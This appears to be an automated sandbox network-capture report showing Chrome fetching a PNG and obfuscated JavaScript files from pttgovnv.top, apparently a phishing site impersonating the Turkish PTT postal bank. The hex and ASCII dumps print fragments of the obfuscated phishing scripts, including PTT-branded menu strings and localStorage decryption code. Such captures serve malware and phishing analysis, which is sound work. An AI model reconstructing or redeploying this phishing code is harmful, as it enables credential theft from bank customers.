    2024-09-01 22:28:24 UTC632INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
    Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~
    2024-09-01 22:28:24 UTC1369INData Raw: a0 c9 1c 00 e2 41 70 02 6a aa db ef 54 95 ab 4a 29 bd 20 4c 01 c0 f0 08 4e 40 03 e6 c5 9f b6 8c 2a 7e 0a 97 bd f2 95 29 65 03 94 39 2a ca 62 ae 7e 57 0b 1a cf 01 a0 5b 04 27 a0 a1 75 e6 3b f5 e9 93 40 f5 99 3a a2 42 05 00 ed 20 38 01 2d 58 be b8 7d 60 3f 4c 5f 87 cb 28 85 40 f5 d6 fe 6e e1 96 fc ca c9 5b fd d7 97 f3 f0 8f 01 00 6b 20 38 01 2d e8 b2 59 bc 6b ee b8 18 a5 8f a4 87 4a db 60 a5 97 c5 82 65 3f 00 38 1f c1 09 68 49 5f cd e2 7d 39 6e 4a 57 36 44 15 e6 88 40 05 00 04 27 a0 55 72 18 70 a9 ca 79 2e e1 e9 3c 04 2a 00 63 46 70 02 5a d6 74 b2 78 aa 3e 1a 9b 60 a4 39 bd 58 30 d0 13 40 6e 08 4e 40 07 c6 1a 9e ce e3 8f 98 51 36 40 31 36 01 40 fa 08 4e 40 47 da 3a 96 25 47 ae 21 5d cb 72 9f 59 10 a6 00 a4 84 e0 04 74 88 f0 b4 3e c2 14 80 14 10 9c 80 8e a5
    Data Ascii: ApjTJ) LN@*~)e9*b~W['u;@:B 8-X}`?L_(@n[k 8-YkJ`e?8hI_}9nJW6D@'Urpy.<*cFpZtx>`9X0@nN@Q6@16@N@G:%G!]rYt>
    2024-09-01 22:28:24 UTC1369INData Raw: 5d 76 e4 21 27 04 27 00 ad 56 9f 44 aa 01 4a b8 7e a8 a5 99 d9 df 49 3f 14 4b 79 2d 70 15 49 5d ee 72 d8 30 72 40 70 02 e0 b4 5d 7d 12 f6 86 f9 a4 f8 cd 06 a8 44 97 6c 58 ca 6b 97 6c 2a d0 85 da d5 ef 8b 3d 96 f1 90 2a 82 13 80 8f b4 5e 7d 5a cd 80 4a 78 88 e2 f1 52 5e a9 66 f6 e7 c2 ae bc 86 8e 9b c9 13 ad 4a 62 dc 08 4e 00 3e d1 45 f5 49 a4 bc 84 b7 c2 ae bc 76 d9 f7 c4 b3 a2 d4 bb 1c ef 82 54 10 9c 00 5c 28 54 9f 76 db ae b2 e4 70 b3 94 70 e9 06 6c 2a bd dd 64 2a 3b 3c fb 9e 70 bb f1 98 4c 8e d8 11 9c 00 5c ca 55 9f 3e 37 3b 4d 0e 0c be 48 2e 4d c3 34 94 b7 87 3e 28 c4 8e e0 04 60 2d 61 89 4a 96 ef 5a df ae 2f 37 cb 54 8e 72 b9 8a 79 7e 6b 9b 2a 54 73 c7 bd 71 91 9f 8f 88 f1 21 38 01 a8 a4 fc f7 ad 99 29 6d c8 e9 a0 b2 22 01 ca 7e 2b ed e5 70 b3 a4 0a
    Data Ascii: ]v!''VDJ~I?Ky-pI]r0r@p]}DlXkl*=*^}ZJxR^fJbN>EIvT\(Tvppl*d*;<pL\U>7;MH.M4>(`-aJZ/7Try~k*Tsq!8)m"~+p
    2024-09-01 22:28:24 UTC1369INData Raw: 3f 28 d6 fe 0c de 4c ee bd be 19 2e 71 0a 01 ea 04 bb ee f2 42 70 02 32 d6 e5 f1 2c ae cf 47 9b 6d 65 f4 97 a5 d6 5b f6 cb a4 f3 63 50 62 34 f6 5d 76 57 21 40 79 ae ef c9 d8 f0 c4 71 2d c9 23 38 01 99 eb 3c 3c a9 62 73 75 33 08 c7 75 6c d9 6f 96 4d fb e5 32 8a 43 63 a9 3a ad 87 00 15 3e 2f 8c 2c 48 1e c1 09 18 81 70 38 ee bc 8b 30 73 36 3c ad c8 ff 9f ea 8b e5 66 a9 f4 54 19 bd 99 f3 d9 67 54 9d d6 e7 83 bc d9 1d f3 59 78 bc 5f d2 46 70 02 46 c2 85 a7 cf cd 41 57 37 ac 75 6e 06 72 d3 54 aa b4 37 4e 1b a6 94 b2 7f 99 69 aa 7d 52 ee 20 62 ad 8e b4 36 0b ad 8b 03 b6 9e 57 33 f6 c3 84 99 f7 94 2e 82 13 30 32 cb 17 b7 f7 ba 5a 2e a9 f3 24 ed 2a 53 9f a9 a9 99 94 53 7b 33 f9 52 aa 53 f2 7a 0c 37 54 17 8e 84 36 6e 69 a5 28 8b b9 fd b3 1e 11 92 da e3 03 54 b9 67
    Data Ascii: ?(L.qBp2,Gme[cPb4]vW!@yq-#8<<bsu3uloM2Cc:>/,Hp80s6<fTgTYx_FpFAW7unrT7Ni}R b6W3.02Z.$*SS{3RSz7T6ni(Tg
    2024-09-01 22:28:24 UTC1369INData Raw: 5e 2e 2e 5b ee 0a b3 94 16 85 2e e7 aa 98 2c 62 0e 13 e6 c5 9f b6 4a a3 e5 60 d6 c6 c1 d9 2d 55 68 b3 4d 9f 07 aa 58 55 72 c3 65 f2 8c 52 2f 27 77 5f b1 39 a6 43 04 27 f4 4b fa 98 de 2b 59 96 7b 18 5e e9 90 79 a2 ee 6f cc c2 45 36 64 4b be ec 2e 5b 77 a9 eb 6c 55 4a fd ae 16 31 f5 41 f8 4a 5a 39 6b 6b f9 4e 96 32 8b 0f 7a 9b 5e 0f ac e3 bc 4a 6e ea 64 f7 a0 ec 22 0c 97 68 19 c1 09 fd d9 3f 94 86 4c 19 62 d9 5e 1f d3 65 32 1e 82 59 35 3c 9d 25 8d d5 36 4c 2d ec ef 16 85 fd 2b 86 ca 94 5b be 2b dd ee bb c6 e7 0e ca bf 5f 61 8a 6d 96 2c b0 0e bf 74 ec 2a b9 fd 7c 37 75 cc 55 5f 69 14 ef 0c c1 09 dd 93 63 52 b4 96 a7 9f 0e fa 98 2e f5 46 dd 9f 66 7b f4 8a ec 52 33 85 f9 39 5c 36 e6 2a 53 32 68 54 96 f9 24 4c 99 e2 68 88 e0 e1 76 df 15 2e 40 35 ae 00 18 a3 9e
    Data Ascii: ^..[.,bJ`-UhMXUreR/'w_9C'K+Y{^yoE6dK.[wlUJ1AJZ9kkN2z^Jnd"h?Lb^e2Y5<%6L-+[+_am,t*|7uU_icR.Ff{R39\6*S2hT$Lhv.@5
    2024-09-01 22:28:24 UTC1369INData Raw: 57 d2 c7 a4 b5 2c 1b 7c ed 5f 80 fd ba 78 62 83 13 5f 16 97 90 10 53 7e 61 76 ed 17 43 6b 3b 2c 8d 32 8f a4 a1 36 5c ae cd 2d f1 fd ae 6e 9a 49 39 b5 5f f4 5f da af ab a9 fd 1f b3 bf 1a 1b ac ba ab 52 f9 e6 76 ed cf f4 d2 c6 85 a2 a2 2c e6 f6 db f2 2d 67 7d e1 34 57 3d d5 e6 30 5c 26 c3 7e 9e 7e b1 c1 89 5e a7 9a 08 4e b9 71 f3 98 d4 cc 86 a6 ef c3 2b 58 31 ea a5 7a 30 a5 49 7c 0d 6e bb bd d1 8f c3 65 63 d2 84 3e b9 fb 6a 3b 5c b6 c6 ed 6a 73 61 2a d0 e5 cd 52 ab 2b 7b d9 b4 84 a0 65 f1 51 08 a2 72 84 3a 64 73 40 9b 0f 1a 7d 29 ee be e2 fe 5f 13 3f b8 9c 3c 3d b4 37 26 37 c4 72 bc 7d 4c 57 b9 3f e5 3d bf a6 b6 fb 9e e4 29 b7 f8 4d 6f d1 03 84 9c a4 da eb 24 c7 30 51 41 ad 87 71 04 39 90 3e a6 a7 0b 39 57 ee 07 42 d3 15 e4 67 85 b5 48 05 a6 f8 ad b8 29 81
    Data Ascii: W,|_xb_S~avCk;,26\-nI9__Rv,-g}4W=0\&~~^Nq+X1z0I|nec>j;\jsa*R+{eQr:ds@})_?<=7&7r}LW?=)Mo$0QAq9>9WBgH)
    2024-09-01 22:28:24 UTC1369INData Raw: 4e a8 ba d6 40 c5 69 1d 72 a6 d9 52 ef da 9f 16 13 bf 73 c6 72 5d 92 8e ab 50 46 6f db 2f b4 da e3 3f 8e ab 50 f6 2f 7d ef 25 4d b3 68 cd f2 c5 ad 1d ad e2 db 38 a4 3f e8 3f 44 b1 64 bd 7f b8 a5 ee 6f 24 53 f9 22 38 5d c6 2d cb b9 c0 44 1f d3 18 b0 5c 97 3c f3 fc ce b4 54 66 db fe 4e 7a a1 ea 2f e5 29 f5 52 66 f0 c8 f4 67 96 f2 d0 94 ec ec 94 4d 0a e1 32 1a c5 dd 57 71 64 80 a7 8b b7 6a 62 36 d5 df 37 92 78 60 21 38 5d e4 e9 e1 8e fd f1 d0 c7 34 2e cf d4 fd 29 4b 76 99 20 44 21 26 b1 f5 39 c9 f2 a1 ec 5c 0d 97 c3 da 5f 18 fb 41 7b a9 1e 4c 93 38 74 98 e0 74 96 94 0c 95 de b5 bf 6b 34 80 0f 89 32 e6 8f ea c1 06 37 c7 cc b4 19 a2 ec df 0f 0a 63 43 14 cb 79 a8 40 7a e9 64 3c 46 b8 1c 9c f4 07 4e ee be 1a be b7 4f 56 76 de eb ff e7 2f cc 77 ea fe 86 dc 7f a3
    Data Ascii: N@irRsr]PFo/?P/}%Mh8??Ddo$S"8]-D\<TfNz/)RfgM2Wqdjb67x`!8]4.)Kv D!&9\_A{L8ttk427cCy@zd<FNOVv/w
    2024-09-01 22:28:24 UTC1369INData Raw: 31 9a 00 40 1b dc 61 cf 3d 32 f6 01 36 c2 a9 f2 d5 2b 4e c7 86 9d ed 14 67 70 92 3e 26 7f 74 07 7d 4c 75 ac 1a bf ef 4f b7 ba 69 fc ae 20 97 aa 93 1f 4d 40 af 13 80 16 d8 fb 5b 8f 8a d8 46 c4 54 6d 0c ff d4 8d 21 bf 8f e3 0a 4e b2 7b 49 4e d8 a7 8f a9 2e 99 f8 fd 6d e7 8d df 95 e5 52 75 a2 49 1c 40 5a 8c 31 bf ea 7b af 63 9b ad d7 7c a7 b2 e4 04 69 e5 19 40 1c c1 c9 8f 17 90 79 4c 72 66 0d 7d 4c 55 f9 89 df 8f c2 c4 ef d8 3e 20 ab aa 53 fa d3 c4 25 cc bb 43 a3 01 a0 01 6d fa 7b b0 d5 2a 9a f9 47 c7 ea ec a8 3b cf 72 98 46 f1 61 83 93 ac 51 ee 1f ee da c0 f4 3f fb 83 a4 8f a9 0e 09 24 7e e2 77 e4 55 9d 5c e6 3a d1 24 0e 20 1d f1 35 85 5b a6 76 63 f8 c7 24 37 0c f0 30 3b 5c 70 92 41 56 d2 c7 24 a3 d4 51 9d ef 63 fa a3 1b 60 39 58 e3 77 05 ae d7 ca 3c 09 57
    Data Ascii: 1@a=26+Ngp>&t}LuOi M@[FTm!N{IN.mRuI@Z1{c|i@yLrf}LU> S%Cm{*G;rFaQ?$~wU\:$ 5[vc$70;\pAV$Qc`9Xw<W
    2024-09-01 22:28:24 UTC1369INData Raw: 4d 77 91 86 df cb 27 bb ea 56 e1 09 9e 84 48 69 fc be e6 d6 43 59 72 19 4a ea 67 d9 49 69 b8 c3 c3 26 01 a4 c7 fc e7 4e ad fe 24 59 a2 8b 7f 66 53 b0 8c f8 c0 e1 86 df cb 1f cf 71 92 f0 24 d5 95 b1 93 c6 6f df 40 b6 43 1f 53 04 ae b9 aa d3 1b 7f 91 22 fd b0 cd 19 22 00 12 f7 bb aa 1c 9c d2 5a a2 73 22 6f 53 a8 7f 08 f0 a7 03 30 a5 ba 32 d6 f0 24 cd c8 85 d9 70 8d df f4 31 c5 43 c2 6b 61 d2 ee 15 92 19 22 2c d9 01 a8 21 a9 25 3a 31 d4 d9 74 55 2d 55 ad c2 c8 a7 c1 49 8c 31 3c 49 f3 b7 34 7e 4b d5 0d f1 71 ff 5d cc 77 e1 2a 45 37 58 b2 03 50 47 a1 8a ad 64 96 e8 9c 04 06 73 4a a1 a4 66 81 e4 fc e0 24 c6 16 9e b4 ba e3 ce e7 43 bc 92 1f 51 c0 92 1d 00 4b 97 6b 2f d5 b9 41 97 f7 5e a6 f3 40 ef 2b eb 5f fb 8b 98 99 96 7a 9c ce 72 4d d1 e6 1b fb 5f 6e 1c bb ed
    Data Ascii: Mw'VHiCYrJgIi&N$YfSq$o@CS""Zs"oS02$p1Cka",!%:1tU-UI1<I4~Kq]w*E7XPGdsJf$CQKk/A^@+_zrM_n
    2024-09-01 22:28:24 UTC1369INData Raw: 34 fa 46 42 fa 85 52 ac 3c 31 e3 09 40 1f e4 3b 46 47 58 6d 72 59 c1 0c 72 ba 42 3c c1 49 3c d8 98 db 1f c4 48 26 8d eb c7 ec b8 8b 44 ba e1 89 73 12 01 74 eb 9d 92 87 fc 1b fe 22 26 66 66 bf bb 07 19 28 1a cf 52 dd 69 7e 58 e1 ae fd d3 e5 3f 2c 53 42 a2 4c 56 67 c7 dd f0 d2 5d b6 e3 3d 04 a0 7d f1 0e bb 7c a6 ee 4f 07 3b cb 33 ae 8a d3 8a 6f 1a 1f c7 b0 4c 0e 08 8e 07 95 27 00 38 45 c7 b8 2a f2 c6 1d a3 35 a0 38 83 d3 8a f4 3d 15 66 23 fb be a7 d5 01 c1 52 f1 c0 b0 08 4f 00 20 1b b6 b6 ec f7 ca df c2 55 3c 8a e1 67 22 c6 1d 9c c4 c9 bc a7 5f c2 2b 79 92 66 5f 8e 69 89 03 e1 09 c0 98 b9 ef 10 bd 1b ae e2 31 c0 e8 81 f3 c4 d9 e3 74 11 09 15 72 8c 49 fe 9e b9 52 24 3d 2b c3 a2 e7 09 c0 18 ed 1f da d0 a4 1f 86 ab 58 0c da d7 74 5a 5a c1 49 b8 e9 a5 fa c0 55
    Data Ascii: 4FBR<1@;FGXmrYrB<I<H&Dst"&ff(Ri~X?,SBLVg]=}|O;3oL'8E*58=f#RO U<g"_+yf_i1trIR$=+XtZZIU


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    17192.168.2.449758104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC755INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"a97-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 37245
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyqiUJinu6hvO5VhmhwfMk5SQqsqtkXQMXIGdSaV5dK6H1OwKdPU8ZBXyPcLqhnj4tvVRFDuwx1NVxkXfsRCAQleJfWJq63L3Nxf3B%2FQ83z2Zul2GHXGRsiFHC34%2F3E%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1724fa042a1-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC614INData Raw: 61 39 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f
    Data Ascii: a97(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_
    2024-09-01 22:28:24 UTC1369INData Raw: 78 33 36 64 65 2c 30 78 62 66 39 37 31 29 29 3b 63 6f 6e 73 74 20 61 33 31 5f 30 78 32 38 65 37 66 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 63 38 32 31 34 35 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 62 37 37 38 2c 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 33 62 38 39 3d 5f 30 78 63 38 32 31 34 35 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 63 32 64 35 3d 61 33 31 5f 30 78 33 35 35 65 3b 69 66 28 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 62 33 30 34 3d 5f 30 78 32 30 64 65 63 33 5b 5f 30 78 33 61 63 32 64 35 28 30 78 31 32 61 29 5d 28 5f 30 78 33 65 62 37 37 38 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30
    Data Ascii: x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0
    2024-09-01 22:28:24 UTC735INData Raw: 2c 5f 30 78 35 32 31 31 65 32 3d 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 39 29 5d 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 30 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 37 29 5d 28 5f 30 78 31 64 62 64 31 34 29 7c 7c 27 27 2c 5f 30 78 61 34 65 37 35 65 29 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 38 29 5d 28 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 34 29 5d 5b 27 55 74 66 38 27 5d 29 2c 5f 30 78 35 35 65 61 32 65 3d 4a 53 4f 4e 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 66 29 5d 28 5f 30 78 35 32 31 31 65 32 7c 7c 27 7b 7d 27 29 3b 69 66 28 5f 30 78 34 65 62 61 33 33 29 7b 5f 30 78 35 35 65 61 32 65 5b 5f 30 78 63 65 34
    Data Ascii: ,_0x5211e2=a31_0x34f513[_0x49d95c(0x129)][_0x49d95c(0x130)](localStorage[_0x49d95c(0x127)](_0x1dbd14)||'',_0xa4e75e)[_0x49d95c(0x128)](a31_0x34f513[_0x49d95c(0x134)]['Utf8']),_0x55ea2e=JSON[_0x49d95c(0x13f)](_0x5211e2||'{}');if(_0x4eba33){_0x55ea2e[_0xce4
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    18192.168.2.449757104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC759INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"2755a-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 43369
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDVqxyBebLHKMelgK1UkVuazR7mqjZJFoUjI1Xy9Vp0IrqKJoAR8ywAW3oGuxW3wGQ%2B3r%2BbjFt44SpzP5ZVOZPy3hsTJCdMDuySenApXcqP1id1C%2F8Oe8uttKirhZ1A%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1725d558c63-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC610INData Raw: 37 63 62 39 0d 0a 63 6f 6e 73 74 20 61 33 33 5f 30 78 37 36 32 63 37 31 3d 61 33 33 5f 30 78 64 61 36 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 32 30 33 39 2c 5f 30 78 33 34 61 33 38 65 29 7b 63 6f 6e 73 74 20 5f 30 78 33 30 33 62 61 65 3d 61 33 33 5f 30 78 64 61 36 65 2c 5f 30 78 32 32 66 32 35 61 3d 5f 30 78 31 64 32 30 33 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 63 31 65 34 62 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 31 66 34 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 34 38 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 38 34 33 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74
    Data Ascii: 7cb9const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt
    2024-09-01 22:28:24 UTC1369INData Raw: 5f 30 78 33 38 62 31 2c 30 78 35 63 62 38 63 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 33 33 5f 30 78 33 38 62 31 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 36 66 37 35 3d 5b 27 65 6d 5f 70 74 74 5f 61 62 6f 27 2c 27 63 7a 30 6e 64 48 4a 68 62 6e 27 2c 27 3e 54 65 62 6c 69 67 61 74 5c 78 32 30 27 2c 27 4f 4e 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 5f 27 2c 27 2d 33 32 27 2c 27 2f 61 3e 3c 2f 73 70 61 6e 3e 27 2c 27 6b 74 61 5f 68 69 7a 6d 65 74 27 2c 27 59 54 34 38 4c 32 52 70 64 6a 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 69 74 65 27 2c 27 62 61 6e 6b 2e 70 74 74 2e 67 27 2c 27 6c 5c 78 32 30 75 69 2d 77 69 64 67 65 27 2c 27 74 41 6b 25 43 34 25 42 31 6c 27 2c 27 4a 76 5a 48 56 6a 64 47 6c 74 27 2c 27 61 67 65 5c 78 32 30 68 61 73 2d 73 75 27 2c 27 23
    Data Ascii: _0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#
    2024-09-01 22:28:24 UTC1369INData Raw: 72 69 5f 27 2c 27 42 6d 59 58 6c 6b 59 57 7a 45 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 68 27 2c 27 68 69 64 64 65 6e 27 2c 27 6e 65 77 73 70 61 70 65 72 5c 78 32 32 27 2c 27 65 62 70 61 72 74 5c 78 32 32 3e 3c 64 27 2c 27 69 6e 5f 61 63 69 6b 6c 61 6d 27 2c 27 4e 54 55 76 64 32 56 69 49 48 27 2c 27 5f 64 69 67 65 72 5f 70 6f 73 27 2c 27 61 73 70 78 27 2c 27 6f 6e 74 61 69 6e 65 72 5c 78 32 30 6e 27 2c 27 69 5f 62 61 6e 6b 61 73 69 5f 27 2c 27 3c 2f 61 3e 3c 2f 64 69 76 3e 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 63 27 2c 27 46 6d 79 6a 41 34 37 4b 38 77 27 2c 27 74 72 61 6e 73 5c 78 32 30 68 61 73 2d 27 2c 27 69 74 69 6f 6e 5c 78 32 32 5c 78 32 30 68 72 65 27 2c 27 73 78 2d 6d 65 6e 75 27 2c 27 69 5c 78 32 30 3c 2f 61 3e 3c 61
    Data Ascii: ri_','BmYXlkYWzE','jaxLink\x22\x20h','hidden','newspaper\x22','ebpart\x22><d','in_aciklam','NTUvd2ViIH','_diger_pos','aspx','ontainer\x20n','i_bankasi_','</a></div>','jaxLink\x22\x20c','FmyjA47K8w','trans\x20has-','ition\x22\x20hre','sx-menu','i\x20</a><a
    2024-09-01 22:28:24 UTC1369INData Raw: 27 2c 27 77 74 65 48 4d 74 4e 43 63 2b 27 2c 27 70 6e 67 27 2c 27 59 58 4e 7a 50 53 64 77 64 48 27 2c 27 65 6d 5f 70 74 74 5f 68 67 73 27 2c 27 65 72 69 5f 70 6f 73 74 61 5f 27 2c 27 5c 78 32 32 3e 3c 61 5c 78 32 30 68 72 65 66 3d 27 2c 27 73 78 2d 63 65 6c 6c 27 2c 27 5c 78 32 30 69 64 3d 5c 78 32 32 41 6a 61 78 4c 27 2c 27 63 37 31 2d 34 63 32 64 2d 38 27 2c 27 6b 25 32 30 4b 25 43 34 25 42 27 2c 27 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 6e 27 2c 27 61 6c 2e 61 73 70 78 23 70 74 27 2c 27 6f 74 64 6c 67 5c 78 32 30 6e 6f 69 6e 27 2c 27 2d 31 39 27 2c 27 2f 69 70 63 73 65 72 76 6c 65 27 2c 27 74 65 6d 5c 78 32 30 63 6f 6c 2d 6d 64 27 2c 27 74 5f 69 6c 5f 76 65 5f 69 6c 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 72 6f 77 27 2c 27 2f 2f 77 77 77 2e 66 69 6c 61 27
    Data Ascii: ','wteHMtNCc+','png','YXNzPSdwdH','em_ptt_hgs','eri_posta_','\x22><a\x20href=','sx-cell','\x20id=\x22AjaxL','c71-4c2d-8','k%20K%C4%B','noopener\x20n','al.aspx#pt','otdlg\x20noin','-19','/ipcservle','tem\x20col-md','t_il_ve_il','class=\x22row','//www.fila'
